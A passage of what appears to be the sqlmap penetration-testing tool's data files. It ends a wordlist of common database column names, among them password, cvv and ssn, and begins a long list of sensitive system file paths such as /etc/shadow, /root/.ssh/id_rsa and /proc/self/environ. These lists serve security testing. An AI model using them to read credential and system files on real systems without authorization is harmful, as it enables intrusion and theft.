nter\nidgara\nmorfeoshow\nlingua\npiede\ngtranslate\nunder_menu\nid_disciplina\nnomedip\nbefore\nmod_virtuemart_search\narial\njob_id\nconfig_item\nadd_date\njfdatabase\nmadre\nidragsoc\nidsubscriptiontickets\nloadmodule\njumpmenu\nidsocieta\ncategory_img\nportachiavi\nmf_name\ncodicepaziente\nmod_virtuemart_randomprod\nninja\npro_codice\nmod_vm_cat_menu_specific\nvinod\nnewsfeeds\nid_palestra\nmod_custom\ncss\ndebug\nside\ndipart\nareainterventoid\nmod_flashmod\ntipologiaenteid\nemailcloak\nmod_freeway_events\nid_logho\ncodicemedico\nnuova\ncatarticles\ndst\ngru_codice\nidutente\nidutenti\njob_title\nschedaid\nidmlattach\nzonainterventoid\ntotfasciaeuroid\nstructure_id\natt_codice\nblogger\nplan_table_output\npagenavigation\nidplugin\nvote\nmod_freeway_subscriptions\nidconn\ncerca\nsystem\nlangkey\napp_gruppo_e\nterm_taxonomy_id\nstatement\nparams\noggetto\nmod_cpmfetch\nsignallogin\nid_passwd\ncodrappr\ncoddoc\nstatoavanzamid\nnrsez\nidmlgroup\nrated_id\nkwick\nid_citta\nprc_magg1\nprc_magg2\nflg_fiscale\nbanner_url\nattribute_sku_id\nmod_product_list\nend_date_time\npurchase_id\nclient_url\nvm_manufacturer_category\npfs_id\nveteran\nmod_cd_login\nmenu_selezione\nruoloenteid\nele_codice\npl_id\npayment\nidmlmail\nmod_virtuemart_currencies\nfreeway\nannoid\ncod_dep\narea_id\nprg_art\nalias_area_id\nsent\npo_id\nyoologin\nsys_context\nmod_enugene\nidnotsentmails\nmod_virtuemart_manufacturers\nmenu\ncache\nprg_movimento_riga\nurl_md5\nldap\ntvoti\nvilliam\nfull_news\nyoocarousel\nmain2\nmain3\ndat_utente_mod\nuser_alto\npff_id\nsmilie_id\nmod_date\nbanner\npinsn\ncodice_comune\nvm_payment_method\nidclassificatore\nidgroup\nprogetto\nmod_freeway_shoppingcart\npayment_extrainfo\ncost_id\ngmail\ndat_movimento\nmod_jt_slideshow\ncampo_bol\nidcliente\nprz_merce\nhdesc\nfp_id\njt\nidfile\nji\nmod_catarticles\nmod_virtuemart_latestprod\nmod_customenu\napp_utente_e\nprg_movimento\ninclude_date\ncod\nflipper\nnaresh\ncache_language_id\nid_preventivo\nconfig_owner\nheader\nmootoolnicemenu\nqualificareferenteid\nmodhome\nid_annuncio\nidtitolo\nsource\ncharmsn\nswf\ntutor\nmod_yoo_carousel\nportachiavin\nidevent\nmod_mainmenu\njfcontent\nitem_cd\ntpref\nid_news\nmf_category_name\niddesign\nmoduledir\ncod_clifor\nfkidannofdr\nmod_donimedia_select_box_menu_type1\njfcontacts\njpg\nclient_desc\nmod_freewaylogin\nmod_translate\nflscrvpre\ngrand\nmf_category_desc\npayment_method_name\nextended\nmod_vm_prod_cat_full\nmod_freeway_admin\norecchini\nnlista\njfcategories\nmod_cssmenu\nmod_lxmenu\nmod_flipper_img_rotator\nfkidanagrafica\nid_comune\nstatement_id\nidatleta\ninactive\nmod_sidebarmenuapplestyle\ncandidato\nref_url\ntestq\nind_clifor\nxmlrpc\npingback_id\nl_col_list\nfs_id\npress\nmod_freeway_products\nsemo\nbijoux\nrakesh\nmodulo_contatti\ngoogle\nvm_manufacturer\nvot_proposta_e\nbrend\npost_date\nenugene\nnrcandi\ninvoice\nhome\nsot_utente_e\nsettoreid\nweblinks\ncontacts\nid2\ncodcliente\nnews_title\njob_s_date\nsql_text\naffiliate\nbacklink\ncore\nid_attivita\nindex_num\netertre\nmanufacturer\ncod_utente_cre\ncod_art\nideventcategory\ndat_utente_cre\ncache_id\njoomla\nproduct_list\ncoupon\nmod_sendcart\nbijouxn\npagebreak\nidsessione\narcade\nmod_virtuemart_topten\nbanner_title\nflg_prezzo_con_iva\npartnerid\nvot_utente_e\nsections\nxstandard\nid_scheda\nvm_category\nmod_jumplink\nexclude_date\nruoloid\ncontenuti\naccessorin\ncoppermine\nbanlist_id\nofferte\nidticket\nidsubscription\nbeneficiarioid\noggettistican\njfnewsfeeds\nanelli\nship\nimenu\nna\nnb\nget_ddl\nshort_news\nopenid\ntitoloprogettoid\nconnection_id\nmod_kwick_sliding_menu\nmatr\nid_richiesta\nidoggetto\nlxmenu\ntext_id\nuser_basso\nver_codice\nmayank\nidgrouppermission\nmodules\nclient_img\ndoes_repeat\n\n# site:cn\n\ntypeid\ncronid\nadvid\nadmingid\npayid\ntagname\noptionid\ntemplateid\napplyid\nsearchid\nstyleid\nmedalid\npluginvarid\nfldfuntype\nfldfunindex\ndisplayorder\npluginid\nfldfunopen\nfldfunid\nfldfunhref\nfldfunmemo\nfldfunname\nmobile\ninvisible\npolloptionid\ncachename\ntagid\npluginhookid\npmid\nfldfuninfo\nmagicid\nkeyid\nareaid\nlogid\nfolder\nallno\nvieworder\nclassid\ntopped\nmsg\ntopics\nrankid\ntimeid\niconid\nintro\ncorpid\nreplies\noperation\nannounceid\nnickname\ngoods_id\nattachment\nspecial\nhk_name\nstylevarid\nposterid\ncurtopics\nallowbanip\nhide\nallowdelpost\ndb_value\npicurl\nyahoo\nadid\ndigest\nn_id\nhidden\nolimg\nlastpost\nsignature\nlastposttime\ndoid\nauthstr\ntabid\norg_code\ntypename\nallowstickthread\ndepartmentid\nallowmassprune\nidentify\nold\navatar\nallowedituser\nforumname\ndescrip\nblogid\nallowmoduser\nlastposterid\ntoday\ntempfidlist\nfeedid\ncourseid\nolid\nhk_value\nxh\nallowpostannounce\ncopy\nsplitstring\nicon\nfidlist\nlastpostpmtime\narticle\nformer\nprojectid\navatarheight\nhtml\nalloweditpoll\ndownloads\nchannelid\nallowbanuser\nappid\nallowcensorword\nemailid\nlastexecuted\ndecl_mail\nlastupdatetime\nbillid\nvid\nlastposter\nallowrefund\nallowviewrealname\ninstalled\nlasttid\npostcount\nsearchstring\nreason\ncustomstatus\ntitleid\nnewpms\nverifycode\nforumid\nattention\nreadperm\nskype\nlastsearchtime\nbio\nlastpostid\nidcard\npostdatetime\nquestion\nposter\nsightml\nhighlight\npageid\nthreadorder\ntodaycount\ncurrentindex\navatarwidth\nmagic\nallowmodpost\nallowviewip\npro_id\niid\ndecrip\nalloweditpost\nmailid\nlastforumposterid\naccountid\ntids\nmedals\nfileid\npostid\nclosed\nlastactivity\nnewnotices\nallowviewlog\nexpiration\nlayer\nishtml\ncommand\nbrand_id\ndisablepostctrl\nfieldname\n\n# site:id\n\najar\nakses\naktif\nakun\nalamat\nbatas\ncabang\ndeskripsi\nfoto\nharga\nhp\njeda\njenis\njml\njudul\njumlah\nkata_kunci\nkata_sandi\nkatakunci\nkatasandi\nkategori\nkelas\nketerangan\nkode\nkunci\nlahir\nnama\nnama_akun\nnama_ibu_kandung\nnama_pengguna\nnamaakun\nnamapengguna\npekerjaan\npendidikan\npengguna\npenjelasan\nperusahaan\nponsel\nprofesi\nruang\nsandi\nsoal\nsurat_elektronik\nsurel\ntanggal\ntanggal_lahir\ntelepon\ntempat\ntempat_lahir\ntmp_lahir\nuniversitas\nurut\nwaktu\n\n# WebGoat\n\ncookie\nlogin_count\n\n# https://sqlwiki.netspi.com/attackQueries/dataTargeting/\n\ncredit\ncard\npin\ncvv\npan\npassword\nsocial\nssn\naccount\nconfidential\n\n# Misc\n\nu_pass\nhashedPw\n"
  },
  {
    "path": "sqlmap/data/txt/common-files.txt",
    "content": "# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n# CTFs\n\n/flag\n/flag.txt\n/readflag\n\n# Reference: https://gist.github.com/sckalath/78ad449346171d29241a\n\n/apache/logs/access.log\n/apache/logs/error.log\n/bin/php.ini\n/etc/alias\n/etc/apache2/apache.conf\n/etc/apache2/conf/httpd.conf\n/etc/apache2/httpd.conf\n/etc/apache/conf/httpd.conf\n/etc/bash.bashrc\n/etc/chttp.conf\n/etc/crontab\n/etc/crypttab\n/etc/debian_version\n/etc/exports\n/etc/fedora-release\n/etc/fstab\n/etc/ftphosts\n/etc/ftpusers\n/etc/group\n/etc/group-\n/etc/hosts\n/etc/http/conf/httpd.conf\n/etc/httpd.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/httpd/logs/acces_log\n/etc/httpd/logs/acces.log\n/etc/httpd/logs/access_log\n/etc/httpd/logs/access.log\n/etc/httpd/logs/error_log\n/etc/httpd/logs/error.log\n/etc/httpd/php.ini\n/etc/http/httpd.conf\n/etc/inetd.conf\n/etc/inittab\n/etc/issue\n/etc/issue.net\n/etc/lighttpd.conf\n/etc/login.defs\n/etc/mandrake-release\n/etc/motd\n/etc/mtab\n/etc/my.cnf\n/etc/mysql/my.cnf\n/etc/openldap/ldap.conf\n/etc/os-release\n/etc/pam.conf\n/etc/passwd\n/etc/passwd-\n/etc/password.master\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/cgi/php.ini\n/etc/php5/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php5/cgi/php.ini\n/etc/php/apache2/php.ini\n/etc/php/apache/php.ini\n/etc/php/cgi/php.ini\n/etc/php.ini\n/etc/php/php4/php.ini\n/etc/php/php.ini\n/etc/profile\n/etc/proftp.conf\n/etc/proftpd/modules.conf\n/etc/protpd/proftpd.conf\n/etc/pure-ftpd.conf\n/etc/pureftpd.passwd\n/etc/pureftpd.pdb\n/etc/pure-ftpd/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pure-ftpd/pureftpd.pdb\n/etc/redhat-release\n/etc/resolv.conf\n/etc/samba/smb.conf\n/etc/security/environ\n/etc/security/group\n/etc/security/limits\n/etc/security/passwd\n/etc/security/user\n/etc/shadow\n/etc/shadow-\n/etc/slackware-release\n/etc/sudoers\n/etc/SUSE-release\n/etc/sysctl.conf\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/vsftpd.conf\n/etc/vsftpd/vsftpd.conf\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/logs/access.log\n/logs/error.log\n/opt/apache2/conf/httpd.conf\n/opt/apache/conf/httpd.conf\n/opt/xampp/etc/php.ini\n/private/etc/httpd/httpd.conf\n/private/etc/httpd/httpd.conf.default\n/root/.bash_history\n/root/.ssh/id_rsa\n/root/.ssh/id_rsa.pub\n/root/.ssh/known_hosts\n/tmp/access.log\n/usr/apache2/conf/httpd.conf\n/usr/apache/conf/httpd.conf\n/usr/etc/pure-ftpd.conf\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/lib/security/mkuser.default\n/usr/local/apache2/conf/httpd.conf\n/usr/local/apache2/httpd.conf\n/usr/local/apache2/logs/access_log\n/usr/local/apache2/logs/access.log\n/usr/local/apache2/logs/error_log\n/usr/local/apache2/logs/error.log\n/usr/local/apache/conf/httpd.conf\n/usr/local/apache/conf/php.ini\n/usr/local/apache/httpd.conf\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/access.log\n/usr/local/apache/logs/error_log\n/usr/local/apache/logs/error.log\n/usr/local/apache/logs/error. og\n/usr/local/apps/apache2/conf/httpd.conf\n/usr/local/apps/apache/conf/httpd.conf\n/usr/local/etc/apache2/conf/httpd.conf\n/usr/local/etc/apache/conf/httpd.conf\n/usr/local/etc/apache/vhosts.conf\n/usr/local/etc/httpd/conf/httpd.conf\n/usr/local/etc/php.ini\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/httpd/conf/httpd.conf\n/usr/local/lib/php.ini\n/usr/local/php4/httpd.conf\n/usr/local/php4/httpd.conf.php\n/usr/local/php4/lib/php.ini\n/usr/local/php5/httpd.conf\n/usr/local/php5/httpd.conf.php\n/usr/local/php5/lib/php.ini\n/usr/local/php/httpd.conf\n/usr/local/php/httpd.conf.php\n/usr/local/php/lib/php.ini\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/usr/local/pureftpd/etc/pureftpd.pdb\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/Zend/etc/php.ini\n/usr/sbin/pure-config.pl\n/var/cpanel/cpanel.config\n/var/lib/mysql/my.cnf\n/var/local/www/conf/php.ini\n/var/log/access_log\n/var/log/access.log\n/var/log/apache2/access_log\n/var/log/apache2/access.log\n/var/log/apache2/error_log\n/var/log/apache2/error.log\n/var/log/apache/access_log\n/var/log/apache/access.log\n/var/log/apache/error_log\n/var/log/apache/error.log\n/var/log/error_log\n/var/log/error.log\n/var/log/httpd/access_log\n/var/log/httpd/access.log\n/var/log/httpd/error_log\n/var/log/httpd/error.log\n/var/log/messages\n/var/log/messages.1\n/var/log/user.log\n/var/log/user.log.1\n/var/www/conf/httpd.conf\n/var/www/html/index.html\n/var/www/logs/access_log\n/var/www/logs/access.log\n/var/www/logs/error_log\n/var/www/logs/error.log\n/Volumes/webBackup/opt/apache2/conf/httpd.conf\n/Volumes/webBackup/private/etc/httpd/httpd.conf\n/Volumes/webBackup/private/etc/httpd/httpd.conf.default\n/web/conf/php.ini\n\n# Reference: https://github.com/devcoinfet/Sqlmap_file_reader/blob/master/file_read.py\n\n/var/log/mysqld.log\n/var/www/index.php\n\n# Reference: https://github.com/sqlmapproject/sqlmap/blob/master/lib/core/settings.py#L809-L810\n\n/var/www/index.php\n/usr/local/apache/index.php\n/usr/local/apache2/index.php\n/usr/local/www/apache22/index.php\n/usr/local/www/apache24/index.php\n/usr/local/httpd/index.php\n/var/www/nginx-default/index.php\n/srv/www/index.php\n\n/var/www/config.php\n/usr/local/apache/config.php\n/usr/local/apache2/config.php\n/usr/local/www/apache22/config.php\n/usr/local/www/apache24/config.php\n/usr/local/httpd/config.php\n/var/www/nginx-default/config.php\n/srv/www/config.php\n\n# Reference: https://github.com/sqlmapproject/sqlmap/issues/3928\n\n/srv/www/htdocs/index.php\n/usr/local/apache2/htdocs/index.php\n/usr/local/www/data/index.php\n/var/apache2/htdocs/index.php\n/var/www/htdocs/index.php\n/var/www/html/index.php\n\n/srv/www/htdocs/config.php\n/usr/local/apache2/htdocs/config.php\n/usr/local/www/data/config.php\n/var/apache2/htdocs/config.php\n/var/www/htdocs/config.php\n/var/www/html/config.php\n\n# Reference: https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux\n\n/etc/passwd\n/etc/shadow\n/etc/aliases\n/etc/anacrontab\n/etc/apache2/apache2.conf\n/etc/apache2/httpd.conf\n/etc/at.allow\n/etc/at.deny\n/etc/bashrc\n/etc/bootptab\n/etc/chrootUsers\n/etc/chttp.conf\n/etc/cron.allow\n/etc/cron.deny\n/etc/crontab\n/etc/cups/cupsd.conf\n/etc/exports\n/etc/fstab\n/etc/ftpaccess\n/etc/ftpchroot\n/etc/ftphosts\n/etc/groups\n/etc/grub.conf\n/etc/hosts\n/etc/hosts.allow\n/etc/hosts.deny\n/etc/httpd/access.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/httpd/logs/access_log\n/etc/httpd/logs/access.log\n/etc/httpd/logs/error_log\n/etc/httpd/logs/error.log\n/etc/httpd/php.ini\n/etc/httpd/srm.conf\n/etc/inetd.conf\n/etc/inittab\n/etc/issue\n/etc/lighttpd.conf\n/etc/lilo.conf\n/etc/logrotate.d/ftp\n/etc/logrotate.d/proftpd\n/etc/logrotate.d/vsftpd.log\n/etc/lsb-release\n/etc/motd\n/etc/modules.conf\n/etc/motd\n/etc/mtab\n/etc/my.cnf\n/etc/my.conf\n/etc/mysql/my.cnf\n/etc/network/interfaces\n/etc/networks\n/etc/npasswd\n/etc/passwd\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/cgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php5/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php/apache2/php.ini\n/etc/php/apache/php.ini\n/etc/php/cgi/php.ini\n/etc/php.ini\n/etc/php/php4/php.ini\n/etc/php/php.ini\n/etc/printcap\n/etc/profile\n/etc/proftp.conf\n/etc/proftpd/proftpd.conf\n/etc/pure-ftpd.conf\n/etc/pureftpd.passwd\n/etc/pureftpd.pdb\n/etc/pure-ftpd/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pure-ftpd/putreftpd.pdb\n/etc/redhat-release\n/etc/resolv.conf\n/etc/samba/smb.conf\n/etc/snmpd.conf\n/etc/ssh/ssh_config\n/etc/ssh/sshd_config\n/etc/ssh/ssh_host_dsa_key\n/etc/ssh/ssh_host_dsa_key.pub\n/etc/ssh/ssh_host_key\n/etc/ssh/ssh_host_key.pub\n/etc/sysconfig/network\n/etc/syslog.conf\n/etc/termcap\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/vsftpd.chroot_list\n/etc/vsftpd.conf\n/etc/vsftpd/vsftpd.conf\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/logs/pure-ftpd.log\n/logs/security_debug_log\n/logs/security_log\n/opt/lampp/etc/httpd.conf\n/opt/xampp/etc/php.ini\n/proc/cpuinfo\n/proc/filesystems\n/proc/interrupts\n/proc/ioports\n/proc/meminfo\n/proc/modules\n/proc/mounts\n/proc/stat\n/proc/swaps\n/proc/version\n/proc/self/net/arp\n/root/anaconda-ks.cfg\n/usr/etc/pure-ftpd.conf\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/local/apache/conf/modsec.conf\n/usr/local/apache/conf/php.ini\n/usr/local/apache/log\n/usr/local/apache/logs\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/access.log\n/usr/local/apache/audit_log\n/usr/local/apache/error_log\n/usr/local/apache/error.log\n/usr/local/cpanel/logs\n/usr/local/cpanel/logs/access_log\n/usr/local/cpanel/logs/error_log\n/usr/local/cpanel/logs/license_log\n/usr/local/cpanel/logs/login_log\n/usr/local/cpanel/logs/stats_log\n/usr/local/etc/httpd/logs/access_log\n/usr/local/etc/httpd/logs/error_log\n/usr/local/etc/php.ini\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/lib/php.ini\n/usr/local/php4/httpd.conf\n/usr/local/php4/httpd.conf.php\n/usr/local/php4/lib/php.ini\n/usr/local/php5/httpd.conf\n/usr/local/php5/httpd.conf.php\n/usr/local/php5/lib/php.ini\n/usr/local/php/httpd.conf\n/usr/local/php/httpd.conf.ini\n/usr/local/php/lib/php.ini\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/usr/local/pureftpd/etc/pureftpd.pdn\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/www/logs/httpd_log\n/usr/local/Zend/etc/php.ini\n/usr/sbin/pure-config.pl\n/var/adm/log/xferlog\n/var/apache2/config.inc\n/var/apache/logs/access_log\n/var/apache/logs/error_log\n/var/cpanel/cpanel.config\n/var/lib/mysql/my.cnf\n/var/lib/mysql/mysql/user.MYD\n/var/local/www/conf/php.ini\n/var/log/apache2/access_log\n/var/log/apache2/access.log\n/var/log/apache2/error_log\n/var/log/apache2/error.log\n/var/log/apache/access_log\n/var/log/apache/access.log\n/var/log/apache/error_log\n/var/log/apache/error.log\n/var/log/apache-ssl/access.log\n/var/log/apache-ssl/error.log\n/var/log/auth.log\n/var/log/boot\n/var/htmp\n/var/log/chttp.log\n/var/log/cups/error.log\n/var/log/daemon.log\n/var/log/debug\n/var/log/dmesg\n/var/log/dpkg.log\n/var/log/exim_mainlog\n/var/log/exim/mainlog\n/var/log/exim_paniclog\n/var/log/exim.paniclog\n/var/log/exim_rejectlog\n/var/log/exim/rejectlog\n/var/log/faillog\n/var/log/ftplog\n/var/log/ftp-proxy\n/var/log/ftp-proxy/ftp-proxy.log\n/var/log/httpd/access_log\n/var/log/httpd/access.log\n/var/log/httpd/error_log\n/var/log/httpd/error.log\n/var/log/httpsd/ssl.access_log\n/var/log/httpsd/ssl_log\n/var/log/kern.log\n/var/log/lastlog\n/var/log/lighttpd/access.log\n/var/log/lighttpd/error.log\n/var/log/lighttpd/lighttpd.access.log\n/var/log/lighttpd/lighttpd.error.log\n/var/log/mail.info\n/var/log/mail.log\n/var/log/maillog\n/var/log/mail.warn\n/var/log/message\n/var/log/messages\n/var/log/mysqlderror.log\n/var/log/mysql.log\n/var/log/mysql/mysql-bin.log\n/var/log/mysql/mysql.log\n/var/log/mysql/mysql-slow.log\n/var/log/proftpd\n/var/log/pureftpd.log\n/var/log/pure-ftpd/pure-ftpd.log\n/var/log/secure\n/var/log/vsftpd.log\n/var/log/wtmp\n/var/log/xferlog\n/var/log/yum.log\n/var/mysql.log\n/var/run/utmp\n/var/spool/cron/crontabs/root\n/var/webmin/miniserv.log\n/var/www/log/access_log\n/var/www/log/error_log\n/var/www/logs/access_log\n/var/www/logs/error_log\n/var/www/logs/access.log\n/var/www/logs/error.log\n\n# Reference: https://nets.ec/File_Inclusion\n\n/etc/passwd\n/etc/master.passwd\n/etc/shadow\n/var/db/shadow/hash\n/etc/group\n/etc/hosts\n/etc/motd\n/etc/issue\n/etc/release\n/etc/redhat-release\n/etc/crontab\n/etc/inittab\n/proc/version\n/proc/cmdline\n/proc/self/environ\n/proc/self/fd/0\n/proc/self/fd/1\n/proc/self/fd/2\n/proc/self/fd/255\n/etc/httpd.conf\n/etc/apache2.conf\n/etc/apache2/apache2.conf\n/etc/apache2/httpd.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/apache2/conf/httpd.conf\n/etc/apache/conf/httpd.conf\n/usr/local/apache2/conf/httpd.conf\n/usr/local/apache/conf/httpd.conf\n/etc/apache2/sites-enabled/000-default\n/etc/apache2/sites-available/default\n/etc/nginx.conf\n/etc/nginx/nginx.conf\n/etc/nginx/sites-available/default\n/etc/nginx/sites-enabled/default\n/etc/ssh/sshd_config\n/etc/my.cnf\n/etc/mysql/my.cnf\n/etc/php.ini\n/var/mail/www-data\n/var/mail/www\n/var/mail/apache\n/var/mail/nobody\n/var/www/.bash_history\n/root/.bash_history\n/var/root/.bash_history\n/var/root/.sh_history\n/etc/passwd\n/etc/master.passwd\n/etc/shadow\n/var/db/shadow/hash\n/etc/group\n/etc/hosts\n/etc/motd\n/etc/issue\n/etc/release\n/etc/redhat-release\n/etc/crontab\n/etc/inittab\n/proc/version\n/proc/cmdline\n/proc/self/environ\n/proc/self/fd/0\n/proc/self/fd/1\n/proc/self/fd/2\n/proc/self/fd/255\n/etc/httpd.conf\n/etc/apache2.conf\n/etc/apache2/apache2.conf\n/etc/apache2/httpd.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/apache2/conf/httpd.conf\n/etc/apache/conf/httpd.conf\n/usr/local/apache2/conf/httpd.conf\n/usr/local/apache/conf/httpd.conf\n/etc/apache2/sites-enabled/000-default\n/etc/apache2/sites-available/default\n/etc/nginx.conf\n/etc/nginx/nginx.conf\n/etc/nginx/sites-available/default\n/etc/nginx/sites-enabled/default\n/etc/ssh/sshd_config\n/etc/my.cnf\n/etc/mysql/my.cnf\n/etc/php.ini\n/var/mail/www-data\n/var/mail/www\n/var/mail/apache\n/var/mail/nobody\n/var/www/.bash_history\n/root/.bash_history\n/var/root/.bash_history\n/var/root/.sh_history\n/usr/local/apache/httpd.conf\n/usr/local/apache2/httpd.conf\n/usr/local/httpd/conf/httpd.conf\n/usr/local/etc/apache/conf/httpd.conf\n/usr/local/etc/apache2/conf/httpd.conf\n/usr/local/etc/httpd/conf/httpd.conf\n/usr/apache2/conf/httpd.conf\n/usr/apache/conf/httpd.conf\n/etc/http/conf/httpd.conf\n/etc/http/httpd.conf\n/opt/apache/conf/httpd.conf\n/opt/apache2/conf/httpd.conf\n/var/www/conf/httpd.conf\n/usr/local/php/httpd.conf\n/usr/local/php4/httpd.conf\n/usr/local/php5/httpd.conf\n/etc/httpd/php.ini\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/local/etc/php.ini\n/usr/local/lib/php.ini\n/usr/local/php/lib/php.ini\n/usr/local/php4/lib/php.ini\n/usr/local/php5/lib/php.ini\n/usr/local/apache/conf/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php5/apache2/php.ini\n/etc/php/php.ini\n/etc/php/php4/php.ini\n/etc/php/apache/php.ini\n/etc/php/apache2/php.ini\n/usr/local/Zend/etc/php.ini\n/opt/xampp/etc/php.ini\n/var/local/www/conf/php.ini\n/etc/php/cgi/php.ini\n/etc/php4/cgi/php.ini\n/etc/php5/cgi/php.ini\n/var/log/lastlog\n/var/log/wtmp\n/var/run/utmp\n/var/log/messages.log\n/var/log/messages\n/var/log/messages.0\n/var/log/messages.1\n/var/log/messages.2\n/var/log/messages.3\n/var/log/syslog.log\n/var/log/syslog\n/var/log/syslog.0\n/var/log/syslog.1\n/var/log/syslog.2\n/var/log/syslog.3\n/var/log/auth.log\n/var/log/auth.log.0\n/var/log/auth.log.1\n/var/log/auth.log.2\n/var/log/auth.log.3\n/var/log/authlog\n/var/log/syslog\n/var/adm/lastlog\n/var/adm/messages\n/var/adm/messages.0\n/var/adm/messages.1\n/var/adm/messages.2\n/var/adm/messages.3\n/var/adm/utmpx\n/var/adm/wtmpx\n/var/log/kernel.log\n/var/log/secure.log\n/var/log/mail.log\n/var/run/utmp\n/var/log/wtmp\n/var/log/lastlog\n/var/log/access.log\n/var/log/access_log\n/var/log/error.log\n/var/log/error_log\n/var/log/apache2/access.log\n/var/log/apache2/access_log\n/var/log/apache2/error.log\n/var/log/apache2/error_log\n/var/log/apache/access.log\n/var/log/apache/access_log\n/var/log/apache/error.log\n/var/log/apache/error_log\n/var/log/httpd/access.log\n/var/log/httpd/access_log\n/var/log/httpd/error.log\n/var/log/httpd/error_log\n/etc/httpd/logs/access.log\n/etc/httpd/logs/access_log\n/etc/httpd/logs/error.log\n/etc/httpd/logs/error_log\n/usr/local/apache/logs/access.log\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/error.log\n/usr/local/apache/logs/error_log\n/usr/local/apache2/logs/access.log\n/usr/local/apache2/logs/access_log\n/usr/local/apache2/logs/error.log\n/usr/local/apache2/logs/error_log\n/var/www/logs/access.log\n/var/www/logs/access_log\n/var/www/logs/error.log\n/var/www/logs/error_log\n/opt/lampp/logs/access.log\n/opt/lampp/logs/access_log\n/opt/lampp/logs/error.log\n/opt/lampp/logs/error_log\n/opt/xampp/logs/access.log\n/opt/xampp/logs/access_log\n/opt/xampp/logs/error.log\n/opt/xampp/logs/error_log\n\n# Reference: https://github.com/ironbee/ironbee-rules/blob/master/rules/lfi-files.data\n\n/.htaccess\n/.htpasswd\n/access.log\n/access_log\n/apache/conf/httpd.conf\n/apache/logs/access.log\n/apache/logs/error.log\n/apache/php/php.ini\n/apache2/logs/access.log\n/apache2/logs/error.log\n/bin/php.ini\n/boot.ini\n/boot/grub/grub.cfg\n/boot/grub/menu.lst\n/config.inc.php\n/error.log\n/error_log\n/etc/adduser.conf\n/etc/alias\n/etc/apache/access.conf\n/etc/apache/apache.conf\n/etc/apache/conf/httpd.conf\n/etc/apache/default-server.conf\n/etc/apache/httpd.conf\n/etc/apache2/apache.conf\n/etc/apache2/apache2.conf\n/etc/apache2/conf.d/charset\n/etc/apache2/conf.d/phpmyadmin.conf\n/etc/apache2/conf.d/security\n/etc/apache2/conf/httpd.conf\n/etc/apache2/default-server.conf\n/etc/apache2/envvars\n/etc/apache2/httpd.conf\n/etc/apache2/httpd2.conf\n/etc/apache2/mods-available/autoindex.conf\n/etc/apache2/mods-available/deflate.conf\n/etc/apache2/mods-available/dir.conf\n/etc/apache2/mods-available/mem_cache.conf\n/etc/apache2/mods-available/mime.conf\n/etc/apache2/mods-available/proxy.conf\n/etc/apache2/mods-available/setenvif.conf\n/etc/apache2/mods-available/ssl.conf\n/etc/apache2/mods-enabled/alias.conf\n/etc/apache2/mods-enabled/deflate.conf\n/etc/apache2/mods-enabled/dir.conf\n/etc/apache2/mods-enabled/mime.conf\n/etc/apache2/mods-enabled/negotiation.conf\n/etc/apache2/mods-enabled/php5.conf\n/etc/apache2/mods-enabled/status.conf\n/etc/apache2/ports.conf\n/etc/apache2/sites-available/default\n/etc/apache2/sites-available/default-ssl\n/etc/apache2/sites-enabled/000-default\n/etc/apache2/sites-enabled/default\n/etc/apache2/ssl-global.conf\n/etc/apache2/vhosts.d/00_default_vhost.conf\n/etc/apache2/vhosts.d/default_vhost.include\n/etc/apache22/conf/httpd.conf\n/etc/apache22/httpd.conf\n/etc/apt/apt.conf\n/etc/avahi/avahi-daemon.conf\n/etc/bash.bashrc\n/etc/bash_completion.d/debconf\n/etc/bluetooth/input.conf\n/etc/bluetooth/main.conf\n/etc/bluetooth/network.conf\n/etc/bluetooth/rfcomm.conf\n/etc/ca-certificates.conf\n/etc/ca-certificates.conf.dpkg-old\n/etc/casper.conf\n/etc/chkrootkit.conf\n/etc/chrootusers\n/etc/clamav/clamd.conf\n/etc/clamav/freshclam.conf\n/etc/crontab\n/etc/crypttab\n/etc/cups/acroread.conf\n/etc/cups/cupsd.conf\n/etc/cups/cupsd.conf.default\n/etc/cups/pdftops.conf\n/etc/cups/printers.conf\n/etc/cvs-cron.conf\n/etc/cvs-pserver.conf\n/etc/debconf.conf\n/etc/debian_version\n/etc/default/grub\n/etc/deluser.conf\n/etc/dhcp/dhclient.conf\n/etc/dhcp3/dhclient.conf\n/etc/dhcp3/dhcpd.conf\n/etc/dns2tcpd.conf\n/etc/e2fsck.conf\n/etc/esound/esd.conf\n/etc/etter.conf\n/etc/exports\n/etc/fedora-release\n/etc/firewall.rules\n/etc/foremost.conf\n/etc/fstab\